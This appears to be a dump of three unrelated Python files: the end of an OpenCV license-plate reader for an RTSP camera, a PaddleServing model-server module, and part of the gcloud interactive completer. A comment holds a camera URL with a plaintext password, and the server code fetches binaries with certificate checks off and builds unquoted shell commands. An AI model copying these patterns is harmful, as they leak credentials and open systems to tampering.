textSize, baseline = cv2.getTextSize(licPlate.strChars, intFontFace, fltFontScale, intFontThickness) # call getTextSize
# unpack roatated rect into center point, width and height, and angle
( (intPlateCenterX, intPlateCenterY), (intPlateWidth, intPlateHeight), fltCorrectionAngleInDeg ) = licPlate.rrLocationOfPlateInScene
intPlateCenterX = int(intPlateCenterX) # make sure center is an integer
intPlateCenterY = int(intPlateCenterY)
ptCenterOfTextAreaX = int(intPlateCenterX) # the horizontal location of the text area is the same as the plate
ptRegionX = int(intPlateCenterX)
if intPlateCenterY < (sceneHeight * 0.75): # if the license plate is in the upper 3/4 of the image
ptCenterOfTextAreaY = int(round(intPlateCenterY)) + int(round(plateHeight * 1.6)) # write the chars in below the plate
ptRegionY = ptCenterOfTextAreaY + int(round(plateHeight * 1.6))
else: # else if the license plate is in the lower 1/4 of the image
ptCenterOfTextAreaY = int(round(intPlateCenterY)) - int(round(plateHeight * 1.6)) # write the chars in above the plate
ptRegionY = ptCenterOfTextAreaY - int(round(plateHeight * 1.6))
# end if
textSizeWidth, textSizeHeight = textSize # unpack text size width and height
ptLowerLeftTextOriginX = int(ptCenterOfTextAreaX - (textSizeWidth / 2)) # calculate the lower left origin of the text area
ptLowerLeftTextOriginY = int(ptCenterOfTextAreaY + (textSizeHeight / 2)) # based on the text area center, width, and height
ptLowerLeftRegionX = int(ptRegionX - (textSizeWidth / 2)) # calculate the lower left origin of the text area
ptLowerLeftRegionY = int(ptRegionY + (textSizeHeight / 2))
# write the text on the image
cv2.putText(imgOriginalScene, licPlate.strChars, (ptLowerLeftTextOriginX, ptLowerLeftTextOriginY), intFontFace, fltFontScale, SCALAR_YELLOW, intFontThickness)
#cv2.putText(imgOriginalScene, plat, (ptLowerLeftTextOriginX, ptLowerLeftTextOriginY), intFontFace, fltFontScale, SCALAR_YELLOW, intFontThickness)
#cv2.putText(imgOriginalScene, plateRegion, (ptLowerLeftRegionX, ptLowerLeftRegionY), intFontFace, fltFontScale, SCALAR_YELLOW, intFontThickness)
# end function
# searching the plate license ##################################################################################################
def searching(imgOriginalScene,loop):
licenses = ""
if imgOriginalScene is None: # if image was not read successfully
print("error: image not read from file \n") # print error message to std out
os.system("pause") # pause so user can see error message
return
# end if
listOfPossiblePlates = DetectPlates.detectPlatesInScene(imgOriginalScene) # detect plates
#time.sleep(0.02)
listOfPossiblePlates = DetectChars.detectCharsInPlates(listOfPossiblePlates) # detect chars in plates
#time.sleep(0.05)
if (loop == False):
cv2.imshow("imgOriginalScene", imgOriginalScene)
if len(listOfPossiblePlates) == 0:
if (loop == False): # if no plates were found
print("no license plates were detected\n") # inform user no plates were found
else: # else
# if we get in here list of possible plates has at leat one plate
# sort the list of possible plates in DESCENDING order (most number of chars to least number of chars)
listOfPossiblePlates.sort(key = lambda possiblePlate: len(possiblePlate.strChars), reverse = True)
# suppose the plate with the most recognized chars (the first plate in sorted by string length descending order) is the actual plate
licPlate = listOfPossiblePlates[0]
if (loop == False):
cv2.imshow("imgPlate", licPlate.imgPlate) # show crop of plate and threshold of plate
cv2.imshow("imgThresh", licPlate.imgThresh)
if (len(licPlate.strChars) == 0): # if no chars were found in the plate
if (loop == False):
print("no characters were detected\n")
return # show message
# end if
drawRedRectangleAroundPlate(imgOriginalScene, licPlate)
writeLicensePlateCharsOnImage(imgOriginalScene, licPlate)
licenses = licPlate.strChars
if (loop == False):
print("license plate read from image = " + licenses + "\n") # write license plate text to std out
# write license plate text on the image
if (loop == False):
cv2.imshow("imgOriginalScene", imgOriginalScene) # re-show scene image
cv2.imwrite("imgOriginalScene.png", imgOriginalScene)
return imgOriginalScene, licenses
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-src', '--source', dest='video_source', type=int,
default=0, help='Device index of the camera.')
parser.add_argument('-wd', '--width', dest='width', type=int,
default=960, help='Width of the frames in the video stream.')
parser.add_argument('-ht', '--height', dest='height', type=int,
default=720, help='Height of the frames in the video stream.')
args = parser.parse_args()
input_q = Queue(5) # fps is better if queue is higher but then more lags
output_q = Queue()
for i in range(1):
t = Thread(target=worker, args=(input_q, output_q))
t.daemon = True
t.start()
# video_capture = WebcamVideoStream(src='rtsp://admin:gspe12345@192.168.0.26:554/PSIA/streaming/channels/301',
# width=args.width,
# height=args.height).start()
video_capture = WebcamVideoStream(src='rtsp://192.168.0.10:554/user=admin&password=&channel=1&stream=0.sdp?',
width=args.width,
height=args.height).start()
fps = FPS().start()
while True:
frame = video_capture.read()
input_q.put(frame)
t = time.time()
if output_q.empty():
pass # fill up queue
# else:
# font = cv2.FONT_HERSHEY_SIMPLEX
# datakeluar = output_q.get()
# try:
# imgOriginalScenes = datakeluar['imgOriginalScenes']
# for (i,imgOriginalScene) in enumerate(imgOriginalScenes):
# cv2.putText(frame,"Press 's' to save frame to be 'save.png', for calibrating",(10,30),cv2.FONT_HERSHEY_SIMPLEX, 0.5,(255,255,255),1,bottomLeftOrigin = False)
#
# cv2.rectangle(frame,((int(imgOriginalScene.shape[1]/2-230)),(int(imgOriginalScene.shape[0]/2-80))),((int(imgOriginalScene.shape[1]/2+230)),(int(imgOriginalScene.shape[0]/2+80))),SCALAR_GREEN,3)
#
#
# except Exception as e:
# pass
cv2.imshow('imgOriginalScene', frame)
fps.update()
#print('[INFO] elapsed time: {:.2f}'.format(time.time() - t))
if cv2.waitKey(1) & 0xFF == ord('q'):
break
fps.stop()
print('[INFO] elapsed time (total): {:.2f}'.format(fps.elapsed()))
print('[INFO] approx. FPS: {:.2f}'.format(fps.fps()))
video_capture.stop()
cv2.destroyAllWindows()
|
__init__.py
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# pylint: disable=doc-string-missing
import os
from .proto import server_configure_pb2 as server_sdk
from .proto import general_model_config_pb2 as m_config
import google.protobuf.text_format
import tarfile
import socket
import paddle_serving_server_gpu as paddle_serving_server
import time
from .version import serving_server_version
from contextlib import closing
import argparse
import collections
import fcntl
import shutil
import numpy as np
import grpc
from .proto import multi_lang_general_model_service_pb2
import sys
sys.path.append(
os.path.join(os.path.abspath(os.path.dirname(__file__)), 'proto'))
from .proto import multi_lang_general_model_service_pb2_grpc
from multiprocessing import Pool, Process
from concurrent import futures
def serve_args():
parser = argparse.ArgumentParser("serve")
parser.add_argument(
"--thread", type=int, default=2, help="Concurrency of server")
parser.add_argument(
"--model", type=str, default="", help="Model for serving")
parser.add_argument(
"--port", type=int, default=9292, help="Port of the starting gpu")
parser.add_argument(
"--workdir",
type=str,
default="workdir",
help="Working dir of current service")
parser.add_argument(
"--device", type=str, default="gpu", help="Type of device")
parser.add_argument("--gpu_ids", type=str, default="", help="gpu ids")
parser.add_argument(
"--name", type=str, default="None", help="Default service name")
parser.add_argument(
"--mem_optim_off",
default=False,
action="store_true",
help="Memory optimize")
parser.add_argument(
"--ir_optim", default=False, action="store_true", help="Graph optimize")
parser.add_argument(
"--max_body_size",
type=int,
default=512 * 1024 * 1024,
help="Limit sizes of messages")
parser.add_argument(
"--use_multilang",
default=False,
action="store_true",
help="Use Multi-language-service")
return parser.parse_args()
class OpMaker(object):
def __init__(self):
self.op_dict = {
"general_infer": "GeneralInferOp",
"general_reader": "GeneralReaderOp",
"general_response": "GeneralResponseOp",
"general_text_reader": "GeneralTextReaderOp",
"general_text_response": "GeneralTextResponseOp",
"general_single_kv": "GeneralSingleKVOp",
"general_dist_kv_infer": "GeneralDistKVInferOp",
"general_dist_kv": "GeneralDistKVOp"
}
self.node_name_suffix_ = collections.defaultdict(int)
def create(self, node_type, engine_name=None, inputs=[], outputs=[]):
if node_type not in self.op_dict:
raise Exception("Op type {} is not supported right now".format(
node_type))
node = server_sdk.DAGNode()
# node.name will be used as the infer engine name
if engine_name:
node.name = engine_name
else:
node.name = '{}_{}'.format(node_type,
self.node_name_suffix_[node_type])
self.node_name_suffix_[node_type] += 1
node.type = self.op_dict[node_type]
if inputs:
for dep_node_str in inputs:
dep_node = server_sdk.DAGNode()
google.protobuf.text_format.Parse(dep_node_str, dep_node)
dep = server_sdk.DAGNodeDependency()
dep.name = dep_node.name
dep.mode = "RO"
node.dependencies.extend([dep])
# Because the return value will be used as the key value of the
# dict, and the proto object is variable which cannot be hashed,
# so it is processed into a string. This has little effect on
# overall efficiency.
return google.protobuf.text_format.MessageToString(node)
class OpSeqMaker(object):
def __init__(self):
self.workflow = server_sdk.Workflow()
self.workflow.name = "workflow1"
self.workflow.workflow_type = "Sequence"
def add_op(self, node_str):
node = server_sdk.DAGNode()
google.protobuf.text_format.Parse(node_str, node)
if len(node.dependencies) > 1:
raise Exception(
'Set more than one predecessor for op in OpSeqMaker is not allowed.'
)
if len(self.workflow.nodes) >= 1:
if len(node.dependencies) == 0:
dep = server_sdk.DAGNodeDependency()
dep.name = self.workflow.nodes[-1].name
dep.mode = "RO"
node.dependencies.extend([dep])
elif len(node.dependencies) == 1:
if node.dependencies[0].name != self.workflow.nodes[-1].name:
raise Exception(
'You must add op in order in OpSeqMaker. The previous op is {}, but the current op is followed by {}.'.
format(node.dependencies[0].name, self.workflow.nodes[
-1].name))
self.workflow.nodes.extend([node])
def get_op_sequence(self):
workflow_conf = server_sdk.WorkflowConf()
workflow_conf.workflows.extend([self.workflow])
return workflow_conf
class OpGraphMaker(object):
def __init__(self):
self.workflow = server_sdk.Workflow()
self.workflow.name = "workflow1"
# Currently, SDK only supports "Sequence"
self.workflow.workflow_type = "Sequence"
def add_op(self, node_str):
node = server_sdk.DAGNode()
google.protobuf.text_format.Parse(node_str, node)
self.workflow.nodes.extend([node])
def get_op_graph(self):
workflow_conf = server_sdk.WorkflowConf()
workflow_conf.workflows.extend([self.workflow])
return workflow_conf
class Server(object):
def __init__(self):
self.server_handle_ = None
self.infer_service_conf = None
self.model_toolkit_conf = None
self.resource_conf = None
self.memory_optimization = False
self.ir_optimization = False
self.model_conf = None
self.workflow_fn = "workflow.prototxt"
self.resource_fn = "resource.prototxt"
self.infer_service_fn = "infer_service.prototxt"
self.model_toolkit_fn = "model_toolkit.prototxt"
self.general_model_config_fn = "general_model.prototxt"
self.cube_config_fn = "cube.conf"
self.workdir = ""
self.max_concurrency = 0
self.num_threads = 2
self.port = 8080
self.reload_interval_s = 10
self.max_body_size = 64 * 1024 * 1024
self.module_path = os.path.dirname(paddle_serving_server.__file__)
self.cur_path = os.getcwd()
self.use_local_bin = False
self.gpuid = 0
self.model_config_paths = None # for multi-model in a workflow
def set_max_concurrency(self, concurrency):
self.max_concurrency = concurrency
def set_num_threads(self, threads):
self.num_threads = threads
def set_max_body_size(self, body_size):
if body_size >= self.max_body_size:
self.max_body_size = body_size
else:
print(
"max_body_size is less than default value, will use default value in service."
)
def set_port(self, port):
self.port = port
def set_reload_interval(self, interval):
self.reload_interval_s = interval
def set_op_sequence(self, op_seq):
self.workflow_conf = op_seq
def set_op_graph(self, op_graph):
self.workflow_conf = op_graph
def set_memory_optimize(self, flag=False):
self.memory_optimization = flag
def set_ir_optimize(self, flag=False):
self.ir_optimization = flag
def check_local_bin(self):
if "SERVING_BIN" in os.environ:
self.use_local_bin = True
self.bin_path = os.environ["SERVING_BIN"]
def check_cuda(self):
cuda_flag = False
r = os.popen("ldd {} | grep cudart".format(self.bin_path))
r = r.read().split("=")
if len(r) >= 2 and "cudart" in r[1] and os.system(
"ls /dev/ | grep nvidia > /dev/null") == 0:
cuda_flag = True
if not cuda_flag:
raise SystemExit(
"CUDA not found, please check your environment or use cpu version by \"pip install paddle_serving_server\""
)
def set_gpuid(self, gpuid=0):
self.gpuid = gpuid
def _prepare_engine(self, model_config_paths, device):
if self.model_toolkit_conf == None:
self.model_toolkit_conf = server_sdk.ModelToolkitConf()
for engine_name, model_config_path in model_config_paths.items():
engine = server_sdk.EngineDesc()
engine.name = engine_name
# engine.reloadable_meta = model_config_path + "/fluid_time_file"
engine.reloadable_meta = self.workdir + "/fluid_time_file"
os.system("touch {}".format(engine.reloadable_meta))
engine.reloadable_type = "timestamp_ne"
engine.runtime_thread_num = 0
engine.batch_infer_size = 0
engine.enable_batch_align = 0
engine.model_data_path = model_config_path
engine.enable_memory_optimization = self.memory_optimization
engine.enable_ir_optimization = self.ir_optimization
engine.static_optimization = False
engine.force_update_static_cache = False
if device == "cpu":
engine.type = "FLUID_CPU_ANALYSIS_DIR"
elif device == "gpu":
engine.type = "FLUID_GPU_ANALYSIS_DIR"
self.model_toolkit_conf.engines.extend([engine])
def _prepare_infer_service(self, port):
if self.infer_service_conf == None:
self.infer_service_conf = server_sdk.InferServiceConf()
self.infer_service_conf.port = port
infer_service = server_sdk.InferService()
infer_service.name = "GeneralModelService"
infer_service.workflows.extend(["workflow1"])
self.infer_service_conf.services.extend([infer_service])
def _prepare_resource(self, workdir, cube_conf):
self.workdir = workdir
if self.resource_conf == None:
with open("{}/{}".format(workdir, self.general_model_config_fn),
"w") as fout:
fout.write(str(self.model_conf))
self.resource_conf = server_sdk.ResourceConf()
for workflow in self.workflow_conf.workflows:
for node in workflow.nodes:
if "dist_kv" in node.name:
self.resource_conf.cube_config_path = workdir
self.resource_conf.cube_config_file = self.cube_config_fn
if cube_conf == None:
raise ValueError(
"Please set the path of cube.conf while use dist_kv op."
)
shutil.copy(cube_conf, workdir)
self.resource_conf.model_toolkit_path = workdir
self.resource_conf.model_toolkit_file = self.model_toolkit_fn
self.resource_conf.general_model_path = workdir
self.resource_conf.general_model_file = self.general_model_config_fn
def _write_pb_str(self, filepath, pb_obj):
with open(filepath, "w") as fout:
fout.write(str(pb_obj))
def load_model_config(self, model_config_paths):
# At present, Serving needs to configure the model path in
# the resource.prototxt file to determine the input and output
# format of the workflow. To ensure that the input and output
# of multiple models are the same.
workflow_oi_config_path = None
if isinstance(model_config_paths, str):
# If there is only one model path, use the default infer_op.
# Because there are several infer_op type, we need to find
# it from workflow_conf.
default_engine_names = [
'general_infer_0', 'general_dist_kv_infer_0',
'general_dist_kv_quant_infer_0'
]
engine_name = None
for node in self.workflow_conf.workflows[0].nodes:
if node.name in default_engine_names:
engine_name = node.name
break
if engine_name is None:
raise Exception(
"You have set the engine_name of Op. Please use the form {op: model_path} to configure model path"
)
self.model_config_paths = {engine_name: model_config_paths}
workflow_oi_config_path = self.model_config_paths[engine_name]
elif isinstance(model_config_paths, dict):
self.model_config_paths = {}
for node_str, path in model_config_paths.items():
node = server_sdk.DAGNode()
google.protobuf.text_format.Parse(node_str, node)
self.model_config_paths[node.name] = path
print("You have specified multiple model paths, please ensure "
"that the input and output of multiple models are the same.")
workflow_oi_config_path = list(self.model_config_paths.items())[0][
1]
else:
raise Exception("The type of model_config_paths must be str or "
"dict({op: model_path}), not {}.".format(
type(model_config_paths)))
self.model_conf = m_config.GeneralModelConfig()
f = open(
"{}/serving_server_conf.prototxt".format(workflow_oi_config_path),
'r')
self.model_conf = google.protobuf.text_format.Merge(
str(f.read()), self.model_conf)
# check config here
# print config here
def download_bin(self):
os.chdir(self.module_path)
need_download = False
#acquire lock
version_file = open("{}/version.py".format(self.module_path), "r")
import re
for line in version_file.readlines():
if re.match("cuda_version", line):
cuda_version = line.split("\"")[1]
device_version = "serving-gpu-cuda" + cuda_version + "-"
folder_name = device_version + serving_server_version
tar_name = folder_name + ".tar.gz"
bin_url = "https://paddle-serving.bj.bcebos.com/bin/" + tar_name
self.server_path = os.path.join(self.module_path, folder_name)
download_flag = "{}/{}.is_download".format(self.module_path,
folder_name)
fcntl.flock(version_file, fcntl.LOCK_EX)
if os.path.exists(download_flag):
os.chdir(self.cur_path)
self.bin_path = self.server_path + "/serving"
return
if not os.path.exists(self.server_path):
os.system("touch {}/{}.is_download".format(self.module_path,
folder_name))
print('Frist time run, downloading PaddleServing components ...')
r = os.system('wget ' + bin_url + ' --no-check-certificate')
if r != 0:
if os.path.exists(tar_name):
os.remove(tar_name)
raise SystemExit(
'Download failed, please check your network or permission of {}.'.
format(self.module_path))
else:
try:
print('Decompressing files ..')
tar = tarfile.open(tar_name)
tar.extractall()
tar.close()
except:
if os.path.exists(exe_path):
os.remove(exe_path)
raise SystemExit(
'Decompressing failed, please check your permission of {} or disk space left.'.
format(self.module_path))
finally:
os.remove(tar_name)
#release lock
version_file.close()
os.chdir(self.cur_path)
self.bin_path = self.server_path + "/serving"
def prepare_server(self,
workdir=None,
port=9292,
device="cpu",
cube_conf=None):
if workdir == None:
workdir = "./tmp"
os.system("mkdir {}".format(workdir))
else:
os.system("mkdir {}".format(workdir))
os.system("touch {}/fluid_time_file".format(workdir))
if not self.port_is_available(port):
raise SystemExit("Port {} is already used".format(port))
self.set_port(port)
self._prepare_resource(workdir, cube_conf)
self._prepare_engine(self.model_config_paths, device)
self._prepare_infer_service(port)
self.workdir = workdir
infer_service_fn = "{}/{}".format(workdir, self.infer_service_fn)
workflow_fn = "{}/{}".format(workdir, self.workflow_fn)
resource_fn = "{}/{}".format(workdir, self.resource_fn)
model_toolkit_fn = "{}/{}".format(workdir, self.model_toolkit_fn)
self._write_pb_str(infer_service_fn, self.infer_service_conf)
self._write_pb_str(workflow_fn, self.workflow_conf)
self._write_pb_str(resource_fn, self.resource_conf)
self._write_pb_str(model_toolkit_fn, self.model_toolkit_conf)
def port_is_available(self, port):
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as sock:
sock.settimeout(2)
result = sock.connect_ex(('0.0.0.0', port))
if result != 0:
return True
else:
return False
def run_server(self):
# just run server with system command
# currently we do not load cube
self.check_local_bin()
if not self.use_local_bin:
self.download_bin()
# wait for other process to download server bin
while not os.path.exists(self.server_path):
time.sleep(1)
else:
print("Use local bin : {}".format(self.bin_path))
self.check_cuda()
command = "{} " \
"-enable_model_toolkit " \
"-inferservice_path {} " \
"-inferservice_file {} " \
"-max_concurrency {} " \
"-num_threads {} " \
"-port {} " \
"-reload_interval_s {} " \
"-resource_path {} " \
"-resource_file {} " \
"-workflow_path {} " \
"-workflow_file {} " \
"-bthread_concurrency {} " \
"-gpuid {} " \
"-max_body_size {} ".format(
self.bin_path,
self.workdir,
self.infer_service_fn,
self.max_concurrency,
self.num_threads,
self.port,
self.reload_interval_s,
self.workdir,
self.resource_fn,
self.workdir,
self.workflow_fn,
self.num_threads,
self.gpuid,
self.max_body_size)
print("Going to Run Comand")
print(command)
os.system(command)
class MultiLangServerServiceServicer(multi_lang_general_model_service_pb2_grpc.
MultiLangGeneralModelServiceServicer):
def __init__(self, model_config_path, is_multi_model, endpoints):
self.is_multi_model_ = is_multi_model
self.model_config_path_ = model_config_path
self.endpoints_ = endpoints
with open(self.model_config_path_) as f:
self.model_config_str_ = str(f.read())
self._parse_model_config(self.model_config_str_)
self._init_bclient(self.model_config_path_, self.endpoints_)
def _init_bclient(self, model_config_path, endpoints, timeout_ms=None):
from paddle_serving_client import Client
self.bclient_ = Client()
if timeout_ms is not None:
self.bclient_.set_rpc_timeout_ms(timeout_ms)
self.bclient_.load_client_config(model_config_path)
self.bclient_.connect(endpoints)
def _parse_model_config(self, model_config_str):
model_conf = m_config.GeneralModelConfig()
model_conf = google.protobuf.text_format.Merge(model_config_str,
model_conf)
self.feed_names_ = [var.alias_name for var in model_conf.feed_var]
self.feed_types_ = {}
self.feed_shapes_ = {}
self.fetch_names_ = [var.alias_name for var in model_conf.fetch_var]
self.fetch_types_ = {}
self.lod_tensor_set_ = set()
for i, var in enumerate(model_conf.feed_var):
self.feed_types_[var.alias_name] = var.feed_type
self.feed_shapes_[var.alias_name] = var.shape
if var.is_lod_tensor:
self.lod_tensor_set_.add(var.alias_name)
for i, var in enumerate(model_conf.fetch_var):
self.fetch_types_[var.alias_name] = var.fetch_type
if var.is_lod_tensor:
self.lod_tensor_set_.add(var.alias_name)
def _flatten_list(self, nested_list):
for item in nested_list:
if isinstance(item, (list, tuple)):
for sub_item in self._flatten_list(item):
yield sub_item
else:
yield item
def _unpack_inference_request(self, request):
feed_names = list(request.feed_var_names)
fetch_names = list(request.fetch_var_names)
is_python = request.is_python
feed_batch = []
for feed_inst in request.insts:
feed_dict = {}
for idx, name in enumerate(feed_names):
var = feed_inst.tensor_array[idx]
v_type = self.feed_types_[name]
data = None
if is_python:
if v_type == 0:
data = np.frombuffer(var.data, dtype="int64")
elif v_type == 1:
data = np.frombuffer(var.data, dtype="float32")
elif v_type == 2:
data = np.frombuffer(var.data, dtype="int32")
else:
raise Exception("error type.")
else:
if v_type == 0: # int64
data = np.array(list(var.int64_data), dtype="int64")
elif v_type == 1: # float32
data = np.array(list(var.float_data), dtype="float32")
elif v_type == 2:
data = np.array(list(var.int_data), dtype="int32")
else:
raise Exception("error type.")
data.shape = list(feed_inst.tensor_array[idx].shape)
feed_dict[name] = data
feed_batch.append(feed_dict)
return feed_batch, fetch_names, is_python
def _pack_inference_response(self, ret, fetch_names, is_python):
resp = multi_lang_general_model_service_pb2.InferenceResponse()
if ret is None:
resp.err_code = 1
return resp
results, tag = ret
resp.tag = tag
resp.err_code = 0
if not self.is_multi_model_:
results = {'general_infer_0': results}
for model_name, model_result in results.items():
model_output = multi_lang_general_model_service_pb2.ModelOutput()
inst = multi_lang_general_model_service_pb2.FetchInst()
for idx, name in enumerate(fetch_names):
tensor = multi_lang_general_model_service_pb2.Tensor()
v_type = self.fetch_types_[name]
if is_python:
tensor.data = model_result[name].tobytes()
else:
if v_type == 0: # int64
tensor.int64_data.extend(model_result[name].reshape(-1)
.tolist())
elif v_type == 1: # float32
tensor.float_data.extend(model_result[name].reshape(-1)
.tolist())
elif v_type == 2: # int32
tensor.int_data.extend(model_result[name].reshape(-1)
.tolist())
else:
raise Exception("error type.")
tensor.shape.extend(list(model_result[name].shape))
if name in self.lod_tensor_set_:
tensor.lod.extend(model_result["{}.lod".format(name)]
.tolist())
inst.tensor_array.append(tensor)
model_output.insts.append(inst)
model_output.engine_name = model_name
resp.outputs.append(model_output)
return resp
def SetTimeout(self, request, context):
# This porcess and Inference process cannot be operate at the same time.
# For performance reasons, do not add thread lock temporarily.
timeout_ms = request.timeout_ms
self._init_bclient(self.model_config_path_, self.endpoints_, timeout_ms)
resp = multi_lang_general_model_service_pb2.SimpleResponse()
resp.err_code = 0
return resp
def Inference(self, request, context):
feed_dict, fetch_names, is_python = self._unpack_inference_request(
request)
ret = self.bclient_.predict(
feed=feed_dict, fetch=fetch_names, need_variant_tag=True)
return self._pack_inference_response(ret, fetch_names, is_python)
def GetClientConfig(self, request, context):
resp = multi_lang_general_model_service_pb2.GetClientConfigResponse()
resp.client_config_str = self.model_config_str_
return resp
class MultiLangServer(object):
def __init__(self):
self.bserver_ = Server()
self.worker_num_ = 4
self.body_size_ = 64 * 1024 * 1024
self.concurrency_ = 100000
self.is_multi_model_ = False # for model ensemble
def set_max_concurrency(self, concurrency):
self.concurrency_ = concurrency
self.bserver_.set_max_concurrency(concurrency)
def set_num_threads(self, threads):
self.worker_num_ = threads
self.bserver_.set_num_threads(threads)
def set_max_body_size(self, body_size):
self.bserver_.set_max_body_size(body_size)
if body_size >= self.body_size_:
self.body_size_ = body_size
else:
print(
"max_body_size is less than default value, will use default value in service."
)
def set_port(self, port):
self.gport_ = port
def set_reload_interval(self, interval):
self.bserver_.set_reload_interval(interval)
def set_op_sequence(self, op_seq):
self.bserver_.set_op_sequence(op_seq)
def set_op_graph(self, op_graph):
self.bserver_.set_op_graph(op_graph)
def set_memory_optimize(self, flag=False):
self.bserver_.set_memory_optimize(flag)
def set_ir_optimize(self, flag=False):
self.bserver_.set_ir_optimize(flag)
def set_gpuid(self, gpuid=0):
self.bserver_.set_gpuid(gpuid)
def load_model_config(self, server_config_paths, client_config_path=None):
self.bserver_.load_model_config(server_config_paths)
if client_config_path is None:
if isinstance(server_config_paths, dict):
self.is_multi_model_ = True
client_config_path = '{}/serving_server_conf.prototxt'.format(
list(server_config_paths.items())[0][1])
else:
client_config_path = '{}/serving_server_conf.prototxt'.format(
server_config_paths)
self.bclient_config_path_ = client_config_path
def prepare_server(self,
workdir=None,
port=9292,
device="cpu",
cube_conf=None):
if not self._port_is_available(port):
raise SystemExit("Prot {} is already used".format(port))
default_port = 12000
self.port_list_ = []
for i in range(1000):
if default_port + i != port and self._port_is_available(default_port
+ i):
self.port_list_.append(default_port + i)
break
self.bserver_.prepare_server(
workdir=workdir,
port=self.port_list_[0],
device=device,
cube_conf=cube_conf)
self.set_port(port)
def _launch_brpc_service(self, bserver):
bserver.run_server()
def _port_is_available(self, port):
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as sock:
sock.settimeout(2)
result = sock.connect_ex(('0.0.0.0', port))
return result != 0
def run_server(self):
p_bserver = Process(
target=self._launch_brpc_service, args=(self.bserver_, ))
p_bserver.start()
options = [('grpc.max_send_message_length', self.body_size_),
('grpc.max_receive_message_length', self.body_size_)]
server = grpc.server(
futures.ThreadPoolExecutor(max_workers=self.worker_num_),
options=options,
maximum_concurrent_rpcs=self.concurrency_)
multi_lang_general_model_service_pb2_grpc.add_MultiLangGeneralModelServiceServicer_to_server(
MultiLangServerServiceServicer(
self.bclient_config_path_, self.is_multi_model_,
["0.0.0.0:{}".format(self.port_list_[0])]), server)
server.add_insecure_port('[::]:{}'.format(self.gport_))
server.start()
p_bserver.join()
server.wait_for_termination()
|
completer.py
|
# -*- coding: utf-8 -*- #
# Copyright 2017 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""The gcloud interactive shell completion."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import io
import os
import sys
import threading
import time
from googlecloudsdk.calliope import parser_completer
from googlecloudsdk.command_lib.interactive import parser
from googlecloudsdk.command_lib.meta import generate_cli_trees
from googlecloudsdk.core import module_util
from googlecloudsdk.core.console import console_attr
from prompt_toolkit import completion
import six
_INVALID_COMMAND_COUNT = -1
_INVALID_ARG_COMMAND_COUNT = _INVALID_COMMAND_COUNT - 1
_URI_SEP = '://'
# TODO(b/115505558): add a visual element test framework
def _GenerateCompletions(event):
"""completion.generate_completions override that auto selects singletons."""
b = event.current_buffer
if not b.complete_state:
# First TAB -- display the completions in a menu.
event.cli.start_completion(insert_common_part=True, select_first=False)
elif len(b.complete_state.current_completions) == 1:
# Second TAB with only one completion -- select it dadgummit.
b.apply_completion(b.complete_state.current_completions[0])
else:
# Second and subsequent TABs -- rotate through the menu.
b.complete_next()
completion.generate_completions = _GenerateCompletions # MONKEYPATCH!
def _PrettyArgs(args):
"""Pretty prints args into a string and returns it."""
buf = io.StringIO()
buf.write('[')
for arg in args:
buf.write('({},{})'.format(arg.value or '""', arg.token_type.name))
buf.write(']')
return buf.getvalue()
def _Split(path):
"""Returns the list of component names in path, treating foo:// as a dir."""
urisep = _URI_SEP
uri_index = path.find(urisep)
if uri_index >= 0:
n = uri_index + len(_URI_SEP)
return [path[:n-1]] + path[n:].split('/')
return path.split('/')
def _Dirname(path):
"""Returns the dirname of path, '' if it's '.'."""
return '/'.join(_Split(path)[:-1])
class CacheArg(object):
"""A completion cache arg."""
def __init__(self, prefix, completions):
self.prefix = prefix
self.completions = completions
self.dirs = {}
def IsValid(self):
return self.completions is not None
def Invalidate(self):
self.command_count = _INVALID_ARG_COMMAND_COUNT
self.completions = None
self.dirs = {}
class CompletionCache(object):
"""A per-arg cache of completions for the command line under construction.
Since we have no details on the compeleted values this cache is only for the
current command line. This means that async activities by other commands
(creating files, instances, resources) may not be seen until the current
command under construction is executed.
Attributes:
args: The list of CacheArg args holding the completion state for each arg.
completer: The completer object.
command_count: The completer.cli.command_count value for the current cache.
"""
def __init__(self, completer):
self.args = []
self.completer = completer
self.command_count = _INVALID_COMMAND_COUNT
def IsValid(self):
return self.command_count == self.completer.cli.command_count
def ArgMatch(self, args, index):
"""Returns True if args[index] matches the cache prefix for index."""
if not self.args[index].IsValid():
# Only concerned with cached args.
return True
return args[index].value.startswith(self.args[index].prefix)
def Lookup(self, args):
"""Returns the cached completions for the last arg in args or None."""
# No joy if it's not cached or if the command has already executed.
if not args or not self.IsValid():
return None
if len(args) > len(self.args):
return None
# Args before the last must match the cached arg value.
last_arg_index = len(args) - 1
for i in range(last_arg_index):
if not self.ArgMatch(args, i):
return None
# The last arg must have completions and match the completion prefix.
if not self.args[last_arg_index].IsValid():
return None
# Check directory boundaries.
a = args[last_arg_index].value
if a.endswith('/'):
# Entering a subdir, maybe it's already cached.
parent = a[:-1]
self.completer.debug.dir.text(parent)
prefix, completions = self.args[last_arg_index].dirs.get(parent,
(None, None))
if not completions:
return None
self.args[last_arg_index].prefix = prefix
self.args[last_arg_index].completions = completions
elif a in self.args[last_arg_index].dirs:
# Backing up into a parent dir.
self.completer.debug.dir.text(_Dirname(a))
prefix, completions = self.args[last_arg_index].dirs.get(_Dirname(a),
(None, None))
if completions:
self.args[last_arg_index].prefix = prefix
self.args[last_arg_index].completions = completions
# The last arg must match the completion prefix.
if not self.ArgMatch(args, last_arg_index):
return None
# Found valid matching completions in the cache.
return [c for c in self.args[last_arg_index].completions if c.startswith(a)]
def Update(self, args, completions):
"""Updates completions for the last arg in args."""
self.command_count = self.completer.cli.command_count
last_arg_index = len(args) - 1
